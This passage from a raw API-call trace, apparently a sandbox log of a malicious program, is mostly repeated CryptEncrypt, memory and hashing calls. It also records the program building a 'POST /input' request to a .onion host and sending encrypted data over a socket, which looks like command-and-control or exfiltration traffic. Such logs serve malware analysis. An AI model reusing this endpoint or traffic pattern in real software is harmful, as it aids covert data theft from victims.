dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.388] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.388] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.388] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.388] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.388] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.388] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.388] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.388] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.388] malloc (_Size=0x1fd) returned 0x3def010 [0145.388] free (_Block=0x0) [0145.388] free (_Block=0x3df00e0) [0145.388] free (_Block=0x3691270) [0145.388] free (_Block=0x3d81e60) [0145.388] malloc (_Size=0x1fd) returned 0x3d81e60 [0145.388] free (_Block=0x0) [0145.389] malloc (_Size=0x1fd) returned 0x3691270 [0145.389] free (_Block=0x0) [0145.389] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.389] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.389] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.389] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.389] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.389] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.389] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.389] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.389] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.389] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.389] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.389] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.389] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.389] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.389] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.389] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.389] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.390] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.390] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.390] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.390] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.390] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.390] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.390] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.390] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.390] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.390] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.390] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.390] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.390] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.390] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.390] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.390] malloc (_Size=0x1fd) returned 0x3df00e0 [0145.390] free (_Block=0x0) [0145.390] free (_Block=0x3def010) [0145.391] free (_Block=0x3691270) [0145.391] free (_Block=0x3d81e60) [0145.391] malloc (_Size=0x202) returned 0x3d81e60 [0145.391] free (_Block=0x0) [0145.391] EncryptMessage (in: phContext=0x3d81944, fQOP=0x0, pMessage=0x339fa44, MessageSeqNo=0x0 | out: pMessage=0x339fa44) returned 0x0 [0145.391] send (s=0x5b0, buf=0x3689268*, len=543, flags=0) returned 543 [0145.391] free (_Block=0x3d81e60) [0145.391] free (_Block=0x3f65340) [0145.391] free (_Block=0x3df00e0) [0145.391] GetTickCount () returned 0x11653c5 [0145.391] malloc (_Size=0x10) returned 0x3648e00 [0145.391] free (_Block=0x0) [0145.391] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e00*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0145.391] free (_Block=0x3648e00) [0145.391] GetTickCount () returned 0x11653c5 [0145.391] malloc (_Size=0x10) returned 0x3648e78 [0145.391] free (_Block=0x0) [0145.392] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e78*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0146.359] free (_Block=0x3648e78) [0146.359] GetTickCount () returned 0x116579d [0146.359] free (_Block=0x3f652c0) [0146.359] free (_Block=0x3f65280) [0146.359] free (_Block=0x3648d58) [0146.359] free (_Block=0x3d9aa38) [0146.359] free (_Block=0x3648d70) [0146.359] free (_Block=0x3f654a0) [0146.359] free (_Block=0x3f65440) [0146.359] _vscprintf (_Format="POST %s HTTP/1.1\r\nHost: %s\r\n", _ArgList=0x339fbc0) returned 52 [0146.359] malloc (_Size=0x35) returned 0x36243f0 [0146.359] free (_Block=0x0) [0146.360] vsprintf_s (in: _DstBuf=0x36243f0, _SizeInBytes=0x35, _Format="POST %s HTTP/1.1\r\nHost: %s\r\n", _ArgList=0x339fbc0 | out: _DstBuf="POST /input HTTP/1.1\r\nHost: regretzjibibtcgb.onion\r\n") returned 52 [0146.360] malloc (_Size=0x32) returned 0x36244f0 [0146.360] free (_Block=0x0) [0146.360] malloc (_Size=0x66) returned 0x60b2a0 [0146.360] free (_Block=0x36243f0) [0146.360] free (_Block=0x36244f0) [0146.360] _vscprintf (_Format="Content-Length: %d\r\n\r\n", _ArgList=0x339fbc4) returned 22 [0146.360] malloc (_Size=0x17) returned 0x3f65440 [0146.360] free (_Block=0x0) [0146.360] vsprintf_s (in: _DstBuf=0x3f65440, _SizeInBytes=0x17, _Format="Content-Length: %d\r\n\r\n", _ArgList=0x339fbc4 | out: _DstBuf="Content-Length: 21\r\n\r\n") returned 22 [0146.360] malloc (_Size=0x99) returned 0x3594d18 [0146.360] free (_Block=0x60b2a0) [0146.360] free (_Block=0x3f65440) [0146.360] malloc (_Size=0x16) returned 0x3f651e0 [0146.360] free (_Block=0x0) [0146.360] free (_Block=0x3f651e0) [0146.360] malloc (_Size=0x91) returned 0x605a18 [0146.361] free (_Block=0x0) [0146.361] free (_Block=0x0) [0146.361] malloc (_Size=0x1fd) returned 0x3d81e60 [0146.361] free (_Block=0x0) [0146.361] CryptHashData (hHash=0x432978, pbData=0x3d81e60, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0146.361] CryptDuplicateHash (in: hHash=0x432978, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fadc | out: phHash=0x339fadc) returned 1 [0146.361] malloc (_Size=0x14) returned 0x3f65300 [0146.361] free (_Block=0x0) [0146.361] CryptGetHashParam (in: hHash=0x3e0ed8, dwParam=0x2, pbData=0x3f65300, pdwDataLen=0x339fa74, dwFlags=0x0 | out: pbData=0x3f65300, pdwDataLen=0x339fa74) returned 1 [0146.361] CryptDestroyHash (hHash=0x3e0ed8) returned 1 [0146.361] free (_Block=0x3f65300) [0146.361] malloc (_Size=0x1fd) returned 0x3691270 [0146.361] free (_Block=0x0) [0146.361] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.361] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.361] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.361] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.361] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.361] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.361] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.361] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.362] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.363] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.363] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.363] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.363] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.363] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.363] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.363] malloc (_Size=0x1fd) returned 0x3df00e0 [0146.363] free (_Block=0x0) [0146.363] free (_Block=0x0) [0146.363] free (_Block=0x3691270) [0146.363] free (_Block=0x3d81e60) [0146.363] malloc (_Size=0x1fd) returned 0x3d81e60 [0146.363] free (_Block=0x0) [0146.363] malloc (_Size=0x1fd) returned 0x3691270 [0146.363] free (_Block=0x0) [0146.363] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.363] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.363] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.363] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.363] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.363] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.364] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.364] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.364] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.364] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.364] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.364] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.364] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.364] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.364] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.364] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.364] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.364] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.364] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.364] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.364] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, 